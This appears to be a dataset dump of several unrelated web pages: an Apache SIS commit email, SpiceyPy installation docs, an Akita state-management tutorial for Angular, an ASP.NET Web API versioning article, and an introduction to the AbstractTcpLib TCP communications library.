text
stringlengths
20
1.01M
url
stringlengths
14
1.25k
dump
stringlengths
9
15
lang
stringclasses
4 values
source
stringclasses
4 values
This is an automated email from the ASF dual-hosted git repository. desruisseaux pushed a commit to branch geoapi-4.0 in repository The following commit(s) were added to refs/heads/geoapi-4.0 by this push: new ac5e8e0 Fix an `IllegalArgumentException` when creating a coverage with bands using incompatible units. ac5e8e0 is described below commit ac5e8e0fb80e6781e329bf4e6603181904d084d7 Author: Martin Desruisseaux <[email protected]> AuthorDate: Wed Jul 7 13:10:53 2021 +0200 Fix an `IllegalArgumentException` when creating a coverage with bands using incompatible units. --- .../java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java b/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java index fc58d79..1bfad3b 100644 --- a/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java +++ b/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java @@ -28,6 +28,7 @@ import org.opengis.referencing.operation.TransformException; import org.opengis.referencing.operation.NoninvertibleTransformException; import org.apache.sis.referencing.operation.transform.MathTransforms; import org.apache.sis.coverage.SampleDimension; +import org.apache.sis.measure.MeasurementRange; import org.apache.sis.measure.NumberRange; import org.apache.sis.image.DataType; @@ -172,6 +173,14 @@ final class ConvertedGridCoverage extends GridCoverage { if (union == null) { union = range; } else { + /* + * We do not want unit conversions for this union, because the union is used + * only for determining a data type having the capacity to store the values. + * The physical meaning of those values is not relevant here. + */ + if (union instanceof MeasurementRange<?>) { + union = new NumberRange<>(union); + } union = union.unionAny(range); } }
https://mail-archives.eu.apache.org/mod_mbox/sis-commits/202107.mbox/%[email protected]%3E
CC-MAIN-2021-43
en
refinedweb
Installation¶ SpiceyPy is currently supported on Mac, Linux, FreeBSD, and Windows systems. If you are new to python, it is a good idea to read a bit about it first. For new installations of python, it is encouraged to install and or update: pip, setuptools, wheel, and numpy first before installing SpiceyPy pip install -U pip setuptools wheel pip install -U numpy Then to install SpiceyPy, simply run: pip install spiceypy If you use anaconda/miniconda/conda run:¶ conda config --add channels conda-forge conda install spiceypy If no error was returned you have successfully installed SpiceyPy. To verify this you can list the installed packages via this pip command: pip list You should see spicepy in the output of this command. Or you can start a python interpreter and try importing SpiceyPy like so: As of 04/10/2021, spiceypy has experimental support for 64bit ARM processors for linux and macos (linux-aarch64 & osx-arm64) via the conda-forge distribution. import spiceypy # print out the toolkit version installed print(spiceypy.tkvrsn('TOOLKIT')) This should print out the toolkit version without any errors. You have now verified that SpiceyPy is installed. Offline installation¶ If you need to install SpiceyPy without a network or if you have a prebuilt shared library at hand, you can override the default behaviour of SpiceyPy by using the CSPICE_SRC_DIR and CSPICE_SHARED_LIB environment variables respectively. For example, if you have downloaded SpiceyPy and the CSPICE toolkit, and extracted CSPICE to /tmp/cspice you can run: export CSPICE_SRC_DIR="/tmp/cspice" python setup.py install Or if you have a shared library of CSPICE located at /tmp/cspice.so, you can run: export CSPICE_SHARED_LIB="/tmp/cspice.so" python setup.py install Both examples above assume you have cloned the SpiceyPy repository and are running those commands within the project directory. A simple example program¶ This script calls the spiceypy function ‘tkvrsn’ and outputs the return value. File tkvrsn.py from __future__ import print_function import spiceypy def print_ver(): """Prints the TOOLKIT version """ print(spiceypy.tkvrsn('TOOLKIT')) if __name__ == '__main__': print_ver() From the command line, execute the function: $ python tkvrsn.py CSPICE_N0066 From Python, execute the function: $ python >>> import tkvrsn >>> tkvrsn.print_ver() CSPICE_N0066 SpiceyPy Documentation¶ The current version of SpiceyPy does not provide extensive documentation, but there are several ways to navigate your way through the Python version of the toolkit. One simple way is to use the standard Python mechanisms. All interfaces implemented in SpiceyPy can be listed using the standard built-in function dir(), which returns an alphabetized list of names comprising (among) other things, the API names. If you need to get additional information about an API parameters, the standard built-in function help() could be used: >>> import spiceypy >>> help(spiceypy.tkvrsn) which produces Help on function tkvrsn in module spiceypy.spiceypy: tkvrsn(item) Given an item such as the Toolkit or an entry point name, return the latest version string.. html :param item: Item for which a version string is desired. :type item: str :return: the latest version string. :rtype: str As indicated in the help on the function, the complete documentation is available on the CSPICE toolkit version. Therefore it is recommended to have the CSPICE toolkit version installed locally in order to access its documentation offline. Common Issues¶ SSL Alert Handshake Issue¶ Attention As of 2020, users are not likely to experience this issue with python version 3.7 and above, and for newer 3.6.X releases. Users running older operating systems are encouraged to update to newer versions of python if they are attempting to install version 3.0.0 or above. See other sections of this document for more information. In early 2017, JPL updated to a TLS1.2 certificate and enforced https connections causing installation issues for users, in particular for macOS users, with OpenSSL versions older than 1.0.1g. This is because older versions of OpenSSL still distributed in some environments which are incompatible with TLS1.2. As of late 2017 SpiceyPy has been updated with a strategy that can mitigate this issue on some systems, but it may not be totally reliable due to known deficiencies in setuptools and pip. Another solution is to configure a new python installation that is linked against a newer version of OpenSSL, the easiest way to do this is to install python using homebrew, once this is done spiceypy can be installed to this new installation of python (IMHO this is the best option). If your python 3.6 distribution was installed from the packages available at python.org an included command “Install Certificates.command” should be run before attempting to install SpiceyPy again. That command installs the certifi package that can also be install using pip. Alternatively, installing an anaconda or miniconda python distribution and installing SpiceyPy using the conda command above is another possible work around. Users continuing to have issues should report an issue to the github repository. Supporting links: How to install from source (for bleeding edge updates)¶ Attention If you have used the pip or conda install commands above you do not need to do any of the following commands. Installing from source is intended for advanced users. Users on machines running Windows should take note that attempting to install from source will require software such as visual studio and additional environment configuration. Given the complexity of this Windows users are highly encouraged to stick with the releases made available through PyPi/Conda-Forge. If you wish to install from source, first simply clone the repository by running the following in your favorite shell: git clone If you do not have git, you can also directly download the source code from the GitHub repo for SpiceyPy at To install the library, simply change into the root directory of the project and then run: python setup.py install The installation script will download the appropriate version of the SPICE toolkit for your system, and will build a shared library from the included static library files. Then the installation script will install SpiceyPy along with the generated shared library into your site-packages directory.
https://spiceypy.readthedocs.io/en/v4.0.1/installation.html
CC-MAIN-2021-43
en
refinedweb
Managing State in Angular using Akita Reading Time: 4 minutes What is Akita? Akita is a simple and effective state management for Angular applications. Akita is built on top of RxJS and inspired by models like Flux and Redux. Akita encourages simplicity. It saves you the hassle of creating boilerplate code and offers powerful tools with a moderate learning curve, suitable for both experienced and inexperienced developers alike. Akita’s Architecture The heart of Akita is the Store and the Query. A Store is a single object which contains the store state and serves as the “single source of truth.” A Query is a class offering functionality responsible for querying the store. Akita provides two types of stores, a basic store which can hold any shape of data and an entity store which represents a flat collection of entities. Akita keeps the natural work process using Angular services to encapsulate and manage asynchronous logic and store update calls. In this article, we’ll build a books application and focus on the entities store feature because, for the most part, it will be the one you’ll use in your applications. Creating Books Application The Book Model The model is a representation of an entity. Let’s create the Book model. // book.model.ts import { ID } from '@datorama/akita'; export type Book = { id: ID; name: string; author: string; genres: string[]; description: string; }; The Books Store Next thing we need to do is create a books table, i.e., an EntityStore managing a Book object: // books.store.ts import { EntityState, EntityStore, StoreConfig } from '@datorama/akita'; import { Book } from './book.model'; export interface BooksState extends EntityState<Book> {} @StoreConfig({ name: 'books' }) export class BooksStore extends EntityStore<BooksState, Book> { constructor() { super(); } } First, we need to define the stores’ interface. In our case, we can make do with extending the EntityState from Akita, providing it with the Book Entity type. If you are curious, EntityState has the following signature: export interface EntityState<T> { entities: HashMap<T>; ids: ID[]; loading: boolean; error: any; } By using this model, you’ll receive from Akita a lot of built-in functionality, such as CRUD operations on entities, active entity management, error management, etc. The Books Query You can think of the query as being similar to database queries. Its constructor function receives as parameters its own store and possibly other query classes. Let’s see how we can use it to create a books query: import { Injectable } from '@angular/core'; import { QueryEntity, ID } from '@datorama/akita'; import { BooksStore, BooksState } from './books.store'; import { Book } from './book.model'; export class BooksQuery extends QueryEntity<BooksState, Book> { constructor(protected store: BooksStore) { super(store); } } Here, you’ll receive from Akita a lot of built-in functionality, including methods such selectAll(), selectEntity(id), selectCount(), selectActive() and many more. The Books Component After we finished with Akita’s setup, let’s see how we can use it to display the lists of books. // books.component.ts @Component({ templateUrl: './books.component.html' }) export class BooksComponent implements OnInit { books$: Observable<Book[]>; selectLoading$: Observable<boolean>; constructor( private booksQuery: BooksQuery, private booksService: BooksService ) {} ngOnInit() { this.books$ = this.booksQuery.selectAll(); this.selectLoading$ = this.booksQuery.selectLoading(); this.getBooks(); } getBooks() { if (this.booksQuery.isPristine) { this.booksService.getBooks(); } } } The selectLoading() is a query method from Akita that provides the value of the loading key from the store reactively. The initial value of the loading state is set to true and is switched to false when you call store.set(). We’ll take advantage of this feature for toggling a spinner in our view. The selectAll() is self-explanatory – Selects the entire store’s entity collection reactively. Next, we want to call our books endpoint in order to fetch the books from the server only on the first time. When using entities store, it’s initial state is pristine, and when you call store.set(), Akita changes it to false. This can be used to determine whether the data is present in the store, to save on additional server requests. The Books Service Let’s see the getBooks() method. // books.service.ts export class BooksService { constructor(private booksStore: BooksStore) {} getBooks() { timer(300) .pipe(mapTo(booksMock)) .subscribe(books => { this.booksStore.set(books); }); } } The getBooks() method is responsible for fetching the books from the server and adding them to the store. (in real life, this will be a real API call) Let’s also see how we can add easily a sort by functionality with Akita. export class BooksComponent implements OnInit { books$: Observable<Book[]>; selectLoading$: Observable<boolean>; sortControl = new FormControl('price'); ngOnInit() { this.books$ = this.sortControl.valueChanges.pipe( startWith('price'), switchMap(sortBy => this.booksQuery.selectAll({ sortBy })) ); } } The selectAll() method supports sorting the entities collection based on an entity key. We can listen to the control value changes and according to it let Akita sorting the collection. We have one more requirement – when the user clicks on a book, we need to navigate to the book page, showing the full content. The Book Component We’ll leave it to you to set up a new route. Let’s create the book component. // book.component.ts @Component({ templateUrl: './book.component.html' }) export class BookComponent implements OnInit { book$ = this.booksQuery.selectEntity(this.bookId); constructor( private activatedRoute: ActivatedRoute, private booksService: BooksService, private booksQuery: BooksQuery ) {} ngOnInit() { if (this.booksQuery.hasEntity(this.bookId) === false) { this.booksService.getBook(this.bookId); } } get bookId() { return this.activatedRoute.snapshot.params.id; } } We have a book$ observable that returns reactively the current book entity based on the ID we get from the router. A user has the ability to navigate directly to a page in a book, so we need to check if that book entity exists in the bookstore (via the query’s hasEntity() method). If the store doesn’t have the book, we need to fetch it from the server and update the store. // books.service export class BooksService { getBook(id: ID) { timer(300) .pipe(mapTo(bookMock)) .subscribe(book => { this.booksStore.add(book); }); } } Summary We’ve seen here how the various core concepts of Akita work together to give us an easy way to manage a bookstore. This is only a small taste of Akita; it has many more additional features, such as powerful plugins, dev tools, cli, support for active state, transactions, web workers, etc. I encourage you to explore the API by reading the docs and the source code of the demo application. Complete Code Example You can view the complete runnable example here and the source code here About the Author Netanel is a Frontend Architect who works at Datorama, blogs at, open source maintainer, creator of Akita and Spectator, Husband, Father and the Co-founder of HotJS.
https://blog.ng-book.com/managing-state-in-angular-using-akita/
CC-MAIN-2021-43
en
refinedweb
This is the continuation of the Web API Versioning Series, in the previous two articles we have learned • why Versioning is required Read here and • Versioning using URI Read here In this article we will learn how to implement versioning using QueryString. Till now we have two API Controllers :- 1. SilverEmployeeController, which returns Employee's Name ,Id and Salary. 2. GoldEmployeeController , which returns Employee's First Name ,Last Name, Id and Salary. Our Clients know nothing about the real implementation, they just know that they are consuming EmployeeService and there exist two versions of the service. In order to consume the service they have to pass the version number too along with the URL, it's our duty to tell our client how they can pass the version number. There are many ways with which version number can be passed like:- 1. In the Form of routed data .(versioning using URI) 2. In the form of query string (versioning using query string) 3. In the form of Custom Header (versioning using custom header) 4. In the form of Accept Header (versioning using accept header) 5. In the form of Custom Media Types (versioning using Custom media types). Web API versioning using query string simply means the clients are going to specify the version number as the query string parameter like below So, our work is to tell web API to select the appropriate controller based on the version number specified by the client as a query string parameter. • If the client passes v=1, then we have to tell web API to select SilverEmployeeService Controller. • If the client passes v=2, then we have to tell web API to select GoldEmployeeService Controller. In the previous case when the client was passing version number as a routed data value, telling web API to select an appropriate controller based on the version number was easy through routing, but when the version number is being passed as a query string parameter, routing is obviously not going to help, we can't define any route based on the query string value. So, we have to dive deep and try to understand how exactly web API selects controller when the request is issued to a Web API service and is there any way to tweak the default implementation for controller selection. How Web API Selects Controller let us understand how is a controller selected when a request is issued to the following URI • The Web API has a class called DefaultHttpControllerSelector, which is responsible for contoller mapping. • Actually , the "DefaultHttpControllerSelector" class has a method called "SelectController()" that collects the information from the URI and selects the appropriate Controller for processing the request. Now ,in the URI we have following information 1. Name of the Controller - EmloyeeService 2. Value of the Id parameter- 3. So from the URI, the SelectController() method takes the name of the controller in this case "EmployeeService" and finds " EmployeeServiceController" and returns it. This is the default implementation that works behind the scene. But ,what we want ? for the URL ,we want the web API to select the SilverEmployeeController , but we know the web will try to find EmployeeServiceController as it gets EmployeeSrvice as the Controller name from the URI , and since no such controller exists in our application so error will be thrown. Now ,what else we could do to tell the web api to select controller based on the querystring parameter ( version number ) The DefaultHttpControllerSelector class allows us to extend the SelectController() method as it is marked as virtual. So, in order to tell the web api to select controller based on the query string value, we have to extend the SelectController() method and give it our own custom implementation. Step 1.Add a folder in the solution and name it Custom. step 2.Add a class file and name it CustomControllerSelector. Step 3.Inherit this class from DefaultHttpControllerSelector and override the SelectController() method ,like below. using System; using System.Collections.Generic; using System.Linq; using System.Net.Http; using System.Text.RegularExpressions; using System.Web; using System.Web.Http; using System.Web.Http.Controllers; using System.Web.Http.Dispatcher; namespace MyFirstAPIProject.Custom { public class CustomControllerSelector : DefaultHttpControllerSelector { private HttpConfiguration _config; public CustomControllerSelector(HttpConfiguration config) : base(config) { _config = config; } public override HttpControllerDescriptor SelectController(HttpRequestMessage request) { // Get all the available Web API controllers var controllers = GetControllerMapping(); // Get the controller name and parameter values from the request URI var routeData = request.GetRouteData(); // Get the controller name from route data. // The name of the controller in our case is "EmployeeService" var controllerName = routeData.Values["controller"].ToString(); // Default version number to 1 string versionNumber = "1"; var versionQueryString = HttpUtility.ParseQueryString(request.RequestUri.Query); if (versionQueryString["v"] != null) { versionNumber = versionQueryString["v"]; } if (versionNumber == "1") { // if version number is 1, then prepend "Silver" to the controller name. // So at this point the, controller name will become SilverEmployeeService controllerName = "Silver"+controllerName; } else { // if version number is 2, then prepend "Gold" to the controller name. // So at this point the, controller name will GoldEmployeeService controllerName ="Gold"+controllerName; } HttpControllerDescriptor controllerDescriptor; if (controllers.TryGetValue(controllerName, out controllerDescriptor)) { return controllerDescriptor; } return null; } } } The implementation is simple and straight forward, we are getting version number from querystring and accordingly changing the controller Name. Step 4.Tell the web API to use CustomControllerSelector instead of the Default one ,by replacing the IHttpControllerSelector with CustomControllerSelector instance in WebApiConfig.CS file which resides under the App_Start folder. namespace MyFirstAPIProject { public static class WebApiConfig { public static void Register(HttpConfiguration config) { config.Services.Replace(typeof(IHttpControllerSelector), new CustomControllerSelector(config)); config.Routes.MapHttpRoute( name: "DefaultApi", routeTemplate: "api/{controller}/{id}", defaults: new { id = RouteParameter.Optional } ); } } } Now , run the application and fire two get request on the behalf of two different client like below and test the results.
https://www.sharpencode.com/article/WebApi/web-api-versioning/using-querystring-parameters
CC-MAIN-2021-43
en
refinedweb
AbstractTcpLib is a TCP communications library that provides the functionality I have come to believe is the bare minimum that should be available in a TCP library. Using this library, you will be able to easily create and manage TCP connections between client and server, and communicate not only between the client and server but also client to client. This library also provides AES256 encrypted communication, windows authentication, multiple concurrent file transfers to and from the same client, and object serialization for convienient transfer of data between remote machines. When I first started working with TCP communications, I hated the idea of creating several TCP connections from a single application to a server. It seemed slopy. It also seemed like I was cheating, because I believed that I should be able to do all the communicating I needed to over a single session. After all, bytes are bytes, right? If you have a connection to a server, you have a connection to a server. Over the years I came up with different ways to logically separate and manage the data I was sending - but there's just nothing like having an entire session to work with when sending whatever you have to send. So instead of comming up with yet another way to synchronize data between the client and the server, I built a session management system into this library. In this library, sessions really can contain other sessions. They're called Sub-Sessions, and these are the communication channels you will use for everything that you need to logically separate. The beauty of this is that your network hardware and the routers between your local machine and your remote machine will handle the bandwidth balancing between data sent over your subsessions, so while your overall bandwidth per subsession may decrease, they all get as much bandwidth as your switch and router(s) can provide no matter what is being sent over them. Once I had the subsession management system in place, another thought occurred to me. If I have a client that handles and manages (potentially) lots of TCP sessions, what if I logically connected two subsessions belonging to different clients at the server? If it was done correctly, data sent from client 1 over this linked subsession would naturally flow to the other client... and the other client would be able to send data to client 1. All we need is a server that is smart enough to do the associations when we ask it to. We would also need to be able to get a list of connected clients, and clear error messages in the event that we asked the server to create a linked subsession, and for some reason it couldn't. Of course, this is peer to peer communication. In this library, we're calling it "Sub-Session linking". Linked subsessions can be created between any two connected clients. Most TCP libraries out there will allow you to send text, but if you want to send anything else you need to convert the data into a string or a byte array. I spent a long time doing that, and it gets old. It forces you to do quite a bit of parsing, converting strings to byte arrays and converting classes to xml, and xml back into classes in your code. The more different kinds of data you need to send, the more of this there is. Things tend to get ugly fast. This library has only a single .Send() function in the Client and Session classes for sending data. If you use it the way I intended, you will never even think about sending bytes again - because this library's .Send() function accepts any .NET serializable object. You drop your string into the Send() function, and you get a string on the other end. Have a DataTable to send? Drop it in the send function. Have some of your own classes to send? Mark them as serializable, and drop them into the Send() function - and off they go. Send() For this reason, I named the library AbstractTcpLib; Because it abstracts you from the details of sending your data. Of course, serializing objects and deserializing them at the remote end uses some CPU resourses. I'm using the .NET binary serializer, and although it is relatively fast and efficient, those among us who are interested in raw performance will see this as an issue. The good news is that byte arrays aren't serialized. Why? Because, well - that would be silly. The socket class sends byte arrays. Serializing a byte array would just use CPU resourses needlessly, and add a few bytes to the byte array to include information about the byte array object - all for nothing. So if you really want to send Byte[] because you want the best possible network performance, or you're concerned about the binary serializer for one reason or another, or you just would rather work with bytes - then go right ahead. Just drop your byte array into the .Send() function. .Send() Everyone is concerned about security these days. I consult for an access control and video survalence company, and of course security is at the top of their list of priorities. Everything must be encrypted. Everything must be authenticated. It's so important in our society today, that it seems to me that no communications library can be considered complete without security fucnctionality of some kind. In this library, I included two different methods of implementing security measures: AES256 Encryption: The server class works in two modes - encrypted mode and mixed mode. In encrypted mode, all clients must have the correct pre-shared key to connect. Connecting clients are required to register themselves with the server as either a session or a subsession immediately uppon connection. If the server can not decrypt this registration request with it's own PSK, the connection is rejected and the client will simply be disconnected with no error message whatsoever. If the server can decrypt the registration request, it immediately changes the session PSK to a new randomly generated one using RNGCryptoServiceProvider. RNGCryptoServiceProvider LDAP Authentication: The server can be configured to require windows authentication. Before connecting with your Client, enter credentials using the .Login(username, password) function. Credentials are immediately stored as encrypted strings, and passed to the server in the regisration request. The server will attempt to authenticate the credentials against the domain the server machine is in, so sending a domain along with the username (ie: domain\username) is not necessary. If the server is not in a domain, it will attempt to authenticate against the windows workstation it is running on. If the client's authentication fails, it receives an "authentication failure" message, and is disconnected. Mixed Mode vs Encrypted Mode: In mixed mode, clients can create encrypted sessions or subsessions if they choose. It's important to know that if a server is configured to require authentication, but not to require encryption and you create non-encrypted sessions or subsessions, then your windows credentials are being sent as serialized strings - and this is not secure. If you configure the server to require authentication, use encryption also. So you need to send a file. Ok, great - this library has you covered. Need to send two? Sure, of course. How would you like to send them - one at a time, or both at the same time? Or maybe three or four at the same time? It's completely up to you, and what you think your hardware can handle. AbstractTcpLib sends files over subsessions. In fact, if you look at the Client class, you won't see a SendFile() or GetFile() function there at all - those functions live in the Session class. You create a file transfer by first creating a subsession or two. Then you get a refrence to your subsessions (which are Session objects) by using Client.GetSubSession(), and then call Session.SendFile() or Session.GetFile(). SendFile() GetFile() Session Client.GetSubSession() Session.SendFile() Session.GetFile() You can create as many as you like, and you can transfer files between your Client and your Server, or between your Client and another connected client. To transfer files between clients, create a linked subsession first. Then get a refrence to it using Client.GetSubSession() the same way you would any other subsession. Subscribing to File Transfer Events: There are three delegates to subscribe to when initiating or receiving a file transfer: TransferProgress(Uint16 percentComplete), TransferError(String errorMessage), and TransferComplete(). I believe this is self explanatory, and thy work the way you think they will. If you have any questions, please feel free to ask. TransferProgress(Uint16 percentComplete) TransferError(String errorMessage) TransferComplete() Files are transfered using the FileTransfer class. During a transfer, a file transfer object will be associated with each end of a subsession. Subscribing to the Server.receivingAFile(FileTransfer) or Client.receivingAFile(FileTransfer) delegate will allow you to become aware of when you are receiving a file, and you can also subscribe to the transferProgress, transferError and transferComplete delegates on the fileTransfer object so you can track the progress of the incomming file. If you don't want to allow the transfer to continue you can always .Cancel() the transfer on the receiving end before it completes. FileTransfer Client.receivingAFile(FileTransfer) transferProgress transferError transferComplete .Cancel() The Client, Server and Session classes talk to each other using XML. Because this library serializes sent objects, I never needed to parse any xml myself. Instead, I used an XML parser I built called XmlObject. Using XmlObject and this library's ability to serialize objects and pass them back and fourth, I was able to easily and clearly create XmlObject(s), add parameters and other data, pass them to a remote machine where they arrive as XmlObjects, use the tools available in the XmlObject class to easily get at the passed data. XmlObject This library allows some of that communication to be filtered up to you, so that you are notified when sessions disconnect, when they connect and register themselves, when subsessions are created, when there is a connection failure due to incompatible encryption keys, authentication failure, etc. So your client and server will be receiving XmlObjects in your callbacks. Don't be afraid... they are your friends. Both the server and the client use a delegate to pass you incomming data (your sent objects) as it comes in. These delegates have a single CommData object as a parameter. A CommData object is just a wrapper for your passed object. It contains the serialized byte array that came in, a deSerialized Object that is the object you put into sendbytes, only it isn't your String - it's an Object. You could simply test it to make sure it's your String using typeof(String), and then cast it to a String or var, or use the CommData.GetObject(), like this: CommData deSerialized typeof(String) CommData.GetObject() C#: this.client = new Client((Core.CommData data) => { // Get the passed object: var o = data.deSerialized; if (o.GetType() == typeof(XmlObject) && ((XmlObject)o).Name.Equals("ATcpLib")) { XmlObject xml = (XmlObject)data.deSerialized; String msg = xml.GetAttribute("", "internal"); String originId = xml.GetAttribute("", "id"); // Are we shutting down? if(msg.Contains("disconnected") && originId.Equals(client.GetConnectionId())) { UI(() => { lblStatus.Text = "Disconnected."; btConnect.Text = "Connect"; lbSubSessions.Items.Clear(); }); } if (msg.Contains("CreateSubSession") && originId.Equals(client.GetConnectionId()) && xml.GetAttribute("", "status").Equals("true")) { UI(() => { lbSubSessions.Items.Add(xml.GetAttribute("", "subSessionName")); }); } // Is a SubSession shutting down? if (msg.Contains("disconnected") && !originId.Equals(client.GetConnectionId())) VB.NET: Me.client = New Client(Function(ByVal data As Core.CommData) Dim o = data.deSerialized If o.[GetType]() = GetType(XmlObject) AndAlso (CType(o, XmlObject)).Name.Equals("ATcpLib") Then Dim xml As XmlObject = CType(data.deSerialized, XmlObject) Dim msg As String = xml.GetAttribute("", "internal") Dim originId As String = xml.GetAttribute("", "id") If msg.Contains("disconnected") AndAlso originId.Equals(client.GetConnectionId()) Then UI(Function() lblStatus.Text = "Disconnected." btConnect.Text = "Connect" lbSubSessions.Items.Clear() End Function) End If If msg.Contains("CreateSubSession") AndAlso originId.Equals(client.GetConnectionId()) AndAlso xml.GetAttribute("", "status").Equals("true") Then UI(Function() lbSubSessions.Items.Add(xml.GetAttribute("", "subSessionName")) End Function) End If If msg.Contains("disconnected") AndAlso Not originId.Equals(client.GetConnectionId()) Then As you see, the client's constructor takes the incomming data delegate. You connect to the server as follows: String errMsg = ""; client.Login(tbUserName.Text, tbPassword.Text); if (!client.Connect(System.Net.IPAddress.Parse(tbIpAddress.Text.Trim()), ushort.Parse(tbPort.Text.Trim()), tbSessionId.Text.Trim(), out errMsg, cbUseEncryption.Checked, tbPsk.Text)) { MessageBox.Show(errMsg, "Connection failed.", MessageBoxButtons.OK, MessageBoxIcon.Error); return; } Dim errMsg As String = "" client.Login(tbUserName.Text, tbPassword.Text) If Not Me.client.Connect(System.Net.IPAddress.Parse(tbIpAddress.Text.Trim()), UShort.Parse(tbPort.Text.Trim()), tbSessionId.Text.Trim(), errMsg, cbUseEncryption.Checked, tbPsk.Text) Then client.Close() MessageBox.Show(errMsg, "Connection failed.", MessageBoxButtons.OK, MessageBoxIcon.[Error]) Return End If When you connect, a session object is created to handle your client's connection to the server, and added to the server's SessionCollection. You can send objects to the server using your session if you choose, or you can create subsessions. SessionCollection Subsessions are sessions also. When you create a subsession with your client, a Session object is creates and added to your client's subsession collection. On the server, your subsession is registered and added to your session's subsession collection. To send data to the server (or to a peer) over your client's session, use the Client.Send() (or Session.Send()) function, as follows: Client.Send() Session.Send() String errMsg = ""; if(!client.Send(tbMessage.Text, out errMsg)) { MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error); } Dim errMsg As String = "" If Not client.Send(tbMessage.Text, errMsg) Then MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error) End If To send data over a subsession, first get the subsession using it's name (String sessionId) as follows: Session session = null; String errMsg = ""; if(!client.GetSubSession(lbSubSessions.SelectedItems[0].ToString(), out session, out errMsg)) { MessageBox.Show(errMsg, "Could not get subsession.", MessageBoxButtons.OK, MessageBoxIcon.Error); } else { if(!session.Send(tbMessage.Text, out errMsg)) { MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error); } } Dim session As Session = Nothing Dim errMsg As String = "" If Not client.GetSubSession(lbSubSessions.SelectedItems(0).ToString(), session, errMsg) Then MessageBox.Show(errMsg, "Could not get subsession.", MessageBoxButtons.OK, MessageBoxIcon.Error) Else If Not session.Send(tbMessage.Text, errMsg) Then MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error) End If End If To subscribe to the server (or client's) Incomming FileTransfer delegate, do it as follows (this example is taken from the example application. As such, it is updating a listview with the transfer's information): server.receivingAFile = (FileTransfer transfer) => { ListViewItem lvi = new ListViewItem(transfer.FileName()); FileTransfer.TransferComplete complete = null; FileTransfer.TransferProgress updateProgress = null; FileTransfer.TransferError transferError = null; lvi.SubItems.Add("0%"); lvi.SubItems.Add(transfer.DestinationFolder()); lvi.SubItems.Add("Transfering file"); complete = () => { UI(() => lvi.SubItems[3].Text = "Complete"); transfer.transferComplete -= complete; transfer.transferError -= transferError; transfer.transferProgress -= updateProgress; }; updateProgress = (ushort percentComplete) => { UI(() => { lvIncommingFiles.BeginUpdate(); lvi.SubItems[1].Text = percentComplete.ToString() + "%"; lvIncommingFiles.EndUpdate(); }); }; transferError = (String errorMessage) => { UI(() => { lvi.SubItems[2].Text = "Error: " + errorMessage; lvi.ForeColor = Color.Red; }); transfer.transferComplete -= complete; transfer.transferError -= transferError; transfer.transferProgress -= updateProgress; }; transfer.transferComplete += complete; transfer.transferError += transferError; transfer.transferProgress += updateProgress; UI(() => lvIncommingFiles.Items.Add(lvi)); }; server.receivingFile = Sub(transfer As FileTransfer) Dim lvi As New ListViewItem(transfer.FileName()) Dim complete As FileTransfer.FileTransferComplete = Nothing Dim updateProgress As FileTransfer.FileTransferProgress = Nothing Dim transferError As FileTransfer.FileTransferError = Nothing lvi.SubItems.Add("0%") lvi.SubItems.Add(transfer.DestinationFolder()) lvi.SubItems.Add("Transfering file") complete = Sub() UI(Sub() lvi.SubItems(3).Text = "Complete" End Sub) transfer.transferComplete = [Delegate].Remove(transfer.transferComplete, complete) transfer.transferError = [Delegate].Remove(transfer.transferError, transferError) transfer.transferProgress = [Delegate].Remove(transfer.transferProgress, updateProgress) End Sub updateProgress = Sub(percentComplete As UShort) UI(Sub() lvIncommingFiles.BeginUpdate() lvi.SubItems(1).Text = percentComplete.ToString() + "%" lvIncommingFiles.EndUpdate() End Sub) End Sub transferError = Sub(errorMessage As String) UI(Sub() lvi.SubItems(2).Text = "Error: " + errorMessage lvi.ForeColor = Color.Red End Sub) transfer.transferComplete = [Delegate].Remove(transfer.transferComplete, complete) transfer.transferError = [Delegate].Remove(transfer.transferError, transferError) transfer.transferProgress = [Delegate].Remove(transfer.transferProgress, updateProgress) End Sub transfer.transferComplete = [Delegate].Combine(transfer.transferComplete, complete) transfer.transferError = [Delegate].Combine(transfer.transferError, transferError) transfer.transferProgress = [Delegate].Combine(transfer.transferProgress, updateProgress) UI(Function() lvIncommingFiles.Items.Add(lvi)) End Sub I didn't initially include any information about this because - like most developers, I think - I just assumed that everyone would just automatically understand how that worked. Well, today I learned that it's not quite as intuitive as I imagined, so I'm going to outline exactly how to do it here: First, to send your custom classes from your clients to your server, (or the reverse), both your server and your client have to know about them. You can't just create a class in your client and send it. You're server won't understand what it's receiving. 1.) Create a new class file in your project. When I write "your project", I mean the project in which you will be adding a refrence to AnstractTcpLib, and creating an AbstractTcpLib.Client() or an AbstractTcpLib.Server(). If you want to send your own custom class objects back and forth between client and server, you must create this custom class in both the project you are creating an AbstractTcpLib.Client() in, and the project you are creating an AbstractTcpLib.Server() in, and they must be identical. 2.) Change the default namespace to something descriptive and useful in both your server and client applications. In this example project, there is now a "MyObj" class. This class is in the "MyObjects" namespace. There is an identical MyObj class in both the server and the client applications, so you can see how this is done. 3.) When your server (or client) receives an object, you need to test for it using typeof. Something like this will work: if (data.type == typeof(MyObjects.MyObject)) { MyObjects.MyObject obj = (MyObjects.MyObject)data.deSerialized; // Do something with obj here. } If data.type = GetType(MyObjects.MyObject) Then Dim obj As MyObjects.MyObject = DirectCast(data.deSerialized, MyObjects.MyObject) ' Do something with obj here. End If And that's it. If you attempt to send a class or object that the receiving assembly can not understand, you will instead be handed an XmlObject containing the exception information generated when deserialization failed. Of course. Please see the example application for anything else you need to know how to do. If you can't find it there, or you run into an iseue, please feel free to ask below. None yet. Definitelly. Cooperative throttling, for starters. Encrypted regsitration requests for clients using LDAP authentication (at the moment they are only deflated, preventing clear text transmission of login credentials), and more as I think of it, or you ask for it, and I have the time. This library is cool... if I do say so myself. I have enjoyed building it, and to a small degree testing it. But there's a lot of code here, and there's just no way I could test it as thoroughly as I would like... and it's brand new. I'm going to use it in future projects, and post fixes as bugs 